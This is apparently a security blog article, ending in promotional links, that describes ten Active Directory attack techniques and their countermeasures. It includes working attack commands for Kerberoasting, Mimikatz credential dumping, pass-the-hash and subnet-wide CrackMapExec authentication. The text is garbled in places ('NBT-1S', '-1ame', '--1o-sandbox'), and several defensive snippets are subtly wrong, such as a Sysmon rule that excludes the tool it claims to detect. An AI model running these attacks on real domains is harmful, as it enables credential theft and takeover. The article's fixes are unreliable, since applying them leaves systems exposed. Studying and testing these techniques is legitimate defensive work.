Top 10 Active Directory Attack Methods That Will Own Your Network (And How to Stop Them) + Video

By /

Listen to this Post

Featured Image

Introduction:

Active Directory (AD) serves as the central authentication and authorization hub for over 90% of Fortune 500 companies, making it the single most valuable target for cyber attackers. Once compromised, adversaries can move laterally, escalate privileges, dump credential hashes, and effectively control the entire Windows domain. Understanding both the offensive techniques and defensive countermeasures is critical for any enterprise security team seeking to prevent a full domain takeover.

Learning Objectives:

  • Understand the mechanics behind the top 10 Active Directory attack techniques, including Kerberoasting, Pass-the-Hash, and LLMNR poisoning.
  • Learn to execute reconnaissance using BloodHound and LDAP queries to identify privilege escalation paths.
  • Implement defensive hardening measures, monitoring strategies, and command-line mitigations across Windows and Linux environments.

You Should Know:

  1. Kerberoasting – Extracting Service Account Hashes for Offline Cracking

Kerberoasting targets service accounts linked to Service Principal Names (SPNs). An authenticated user requests a Ticket Granting Service (TGS) ticket for any SPN, extracts the encrypted service account hash, and cracks it offline using brute-force or dictionary attacks. This technique does not require elevated privileges and often reveals high-privilege service accounts with weak passwords.

Step-by-step guide – Attacker perspective (authorized testing only):

1. Enumerate SPNs using native Windows tools:

 List all SPNs in the domain
setspn -Q /

Request TGS for a specific SPN using PowerShell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/srvweb01.corp.local"

2. Extract TGS tickets with Mimikatz (post-exploitation):

 Using mimikatz on Windows
mimikatz.exe "kerberos::list /export" exit

3. Crack the hash with hashcat (Linux):

 Convert kirbi to hashcat format using kirbi2john
python3 kirbi2john.py .kirbi > hash.txt

Crack with hashcat mode 13100 (Kerberoast TGS-REP)
hashcat -m 13100 -a 0 hash.txt rockyou.txt

Defensive commands (Windows Server):

 Enforce 25+ character random passwords for service accounts
net user svc_sqlapp /random /passwordreq:yes

Audit service accounts with weak SPNs
Get-ADUser -Filter {ServicePrincipalName -like ""} -Properties ServicePrincipalName, PasswordLastSet | Where-Object {($_.PasswordLastSet -lt (Get-Date).AddMonths(-3))}
  1. LLMNR/NBT-1S Poisoning – Intercepting Credential Hashes in Real Time

When a client cannot resolve a hostname via DNS, it falls back to Link-Local Multicast Name Resolution (LLMNR) or NetBIOS Name Service (NBT-1S). Attackers on the same subnet respond to these requests, impersonate the requested host, and force the victim to send their NTLMv2 hash, which can be relayed or cracked.

Step-by-step guide – Mitigation and detection:

1. Disable LLMNR and NBT-1S via Group Policy:

 Disable LLMNR (via GPO or local policy)
reg add "HKLM\Software\Policies\Microsoft\Windows NT\DNSClient" /v EnableMulticast /t REG_DWORD /d 0 /f

Disable NBT-1S on all network adapters
Get-WmiObject Win32_NetworkAdapterConfiguration | ForEach-Object { $_.SetProperty("EnableNetbios", 0) }
  1. Monitor for poisoning attempts using Sysmon (event ID 1 for suspicious processes): 
    <!-- Sysmon config to detect Responder.py or Inveigh -->
<ProcessCreate onmatch="exclude">
<CommandLine condition="contains">responder</CommandLine>
</ProcessCreate>

3. Enforce SMB signing to prevent relay attacks:

 Enable SMB signing on all domain controllers
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -1ame "RequireSecuritySignature" -Value 1
  1. Pass-the-Hash (PtH) – Lateral Movement Without the Plaintext Password

Attackers extract NTLM hashes from LSASS memory or the SAM hive and use them to authenticate to other systems without ever knowing the plaintext password. Tools like Mimikatz and CrackMapExec make this trivial. Defenders must focus on hash extraction prevention and credential guard.

Step-by-step guide – Attack simulation (authorized red team):

  1. Dump hashes from LSASS using Mimikatz (requires admin): 
    mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

  2. Inject hash into another session for lateral movement:

    mimikatz.exe "sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:e19ccf75ee54e06b06a5907af13cef42" exit

3. Use CrackMapExec to authenticate with hash (Linux):

crackmapexec smb 192.168.1.0/24 -u Administrator -H e19ccf75ee54e06b06a5907af13cef42 --local-auth

Defensive commands:

 Enable Windows Defender Credential Guard (requires reboot)
$credGuard = "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard"
New-ItemProperty -Path $credGuard -1ame "EnableVirtualizationBasedSecurity" -Value 1 -PropertyType DWORD
New-ItemProperty -Path $credGuard -1ame "RequirePlatformSecurityFeatures" -Value 3 -PropertyType DWORD

Block NTLM entirely where possible (Group Policy)
 Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> "Network security: Restrict NTLM: Incoming NTLM traffic"
  1. BloodHound Reconnaissance – Mapping Attack Paths to Domain Admin

BloodHound uses graph theory to identify privilege escalation paths by ingesting AD data via SharpHound collector. Attackers can quickly find misconfigured ACLs, nested groups, and unconstrained delegation. Defenders must use the same tool to remediate high-risk edges.

Step-by-step guide – Running BloodHound defensively:

  1. Collect AD data with SharpHound (run on domain-joined Windows): 
    Download SharpHound.ps1 from GitHub
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain CORP.LOCAL -OutputDirectory C:\BH

  2. Import JSON files into BloodHound (Linux via Neo4j):

    Start Neo4j database
sudo neo4j start

Run BloodHound GUI
bloodhound --1o-sandbox

3. Query for high-risk paths using Cypher:

// Find all users with DCSync rights
MATCH p = (u:User)-[:DCSync]-(c:Computer) WHERE c.domain IS NOT NULL RETURN p

// Find shortest path to Domain Admins
MATCH p=shortestPath((u:User)-[:MemberOf|AdminTo|CanRDP|CanPSRemote1..10]->(g:Group)) WHERE g.objectid ENDS WITH '-512' RETURN p

5. NTDS.dit Extraction – Dumping All Domain Hashes

The NTDS.dit file on domain controllers stores all domain user and computer password hashes. Attackers with domain admin or equivalent privileges can extract it via Volume Shadow Copy or ntdsutil. Defenders must restrict access, monitor for vssadmin usage, and deploy honeytokens.

Step-by-step guide – Attack detection:

  1. Monitor for suspicious vssadmin commands (Windows Event ID 4688): 
    Create advanced audit policy to log process creation
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable

  2. Detect ntdsutil usage with Sysmon (event ID 1):

    <Sysmon>
<EventFiltering>
<ProcessCreate onmatch="include">
<CommandLine condition="contains">ntdsutil</CommandLine>
<CommandLine condition="contains">create</CommandLine>
</ProcessCreate>
</EventFiltering>
</Sysmon>

3. Prevent non-admin access to NTDS.dit:

 Apply strict ACLs (built-in, but verify)
icacls %SystemRoot%\NTDS\ntds.dit /inheritance:r /grant "SYSTEM:(F)" "Domain Admins:(F)"
  1. Password Spraying – Bypassing Lockout Policies One Attempt at a Time

Attackers try a single common password (e.g., “Spring2026”) against hundreds of user accounts, avoiding lockout thresholds. This works remarkably well when organizations lack Azure AD Smart Lockout or intelligent throttling.

Step-by-step guide – Defensive monitoring:

  1. Detect multiple failed logins from single IP across different users (Kusto Query for Azure AD SignInLogs): 
    SignInLogs
| where ResultType == "50057" // Incorrect password
| summarize FailedAttempts = count() by IPAddress, UserPrincipalName
| where FailedAttempts > 3
| summarize UsersTargeted = dcount(UserPrincipalName) by IPAddress
| where UsersTargeted > 10

  2. Implement password filter DLL to block common passwords (Windows):

    Install Azure AD Password Protection on-premises DC agents
.\AzureADPasswordProtectionProxyInstaller.exe /quiet
Register-AzureADPasswordProtectionProxy -ServiceAccountName "corp\svc_azureadproxy"

7. Privilege Escalation via Unconstrained Delegation

When a computer has unconstrained delegation enabled, any user who authenticates to it sends their TGT, which the attacker can extract and use to impersonate them anywhere. This is particularly dangerous for domain controllers.

Step-by-step guide – Remediation:

1. Find all computers with unconstrained delegation (PowerShell):

Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation

2. Disable unconstrained delegation and switch to constrained:

Set-ADComputer -Identity "SRVWEB01" -TrustedForDelegation $false
Set-ADComputer -Identity "SRVWEB01" -PrincipalsAllowedToDelegateToAccount (Get-ADUser -Identity "svc_spn")
  1. LDAP Reconnaissance – Querying Directory Structure Without Logs

Attackers use tools like ldapsearch (Linux) or PowerView to enumerate users, groups, and GPOs via LDAP anonymous binds if allowed. Misconfigured “Everyone” read access exposes the entire directory.

Step-by-step guide – Prevention:

1. Disable anonymous LDAP binds on domain controllers:

 Set registry key to restrict anonymous access
reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "LDAPServerIntegrity" /t REG_DWORD /d 2 /f

2. Enable LDAP signing and channel binding:

reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "RequireSigningSeal" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" /v "LdapEnforceChannelBinding" /t REG_DWORD /d 2 /f

What Undercode Say:

  • Key Takeaway 1: Active Directory attacks succeed not because of sophisticated zero-days, but due to fundamental misconfigurations—weak service account passwords, legacy protocol abuse, and excessive privileges. A disciplined hardening program covering Kerberoasting mitigations (long random passwords), disabling LLMNR/NBT-1S, and enforcing credential guard eliminates over 80% of common attack paths.
  • Key Takeaway 2: Continuous monitoring using BloodHound (run weekly as a defender) and proactive threat hunting for LDAP reconnaissance queries (event ID 1644) transforms AD security from reactive patching to proactive risk reduction. The same tools used by red teams must become the blue team’s daily dashboard.

Prediction:

  • -1: As organizations accelerate hybrid AD and Azure AD Connect deployments, misconfigured hybrid identity synchronization will become the new primary vector for domain escalation, with attackers abusing writeback permissions or Seamless SSO keys stored on-premises.
  • +1: Expect Microsoft to release native AI-driven AD attack path modeling within Defender for Identity by late 2026, automatically generating remediation scripts for high-risk edges without requiring BloodHound or Neo4j expertise.
  • -1: Password spraying and Kerberoasting will remain dominant due to organizational resistance to 20+ character service account passwords and MFA for service principals—human convenience continues to be the weakest link.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Cybersecurity Activedirectory – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: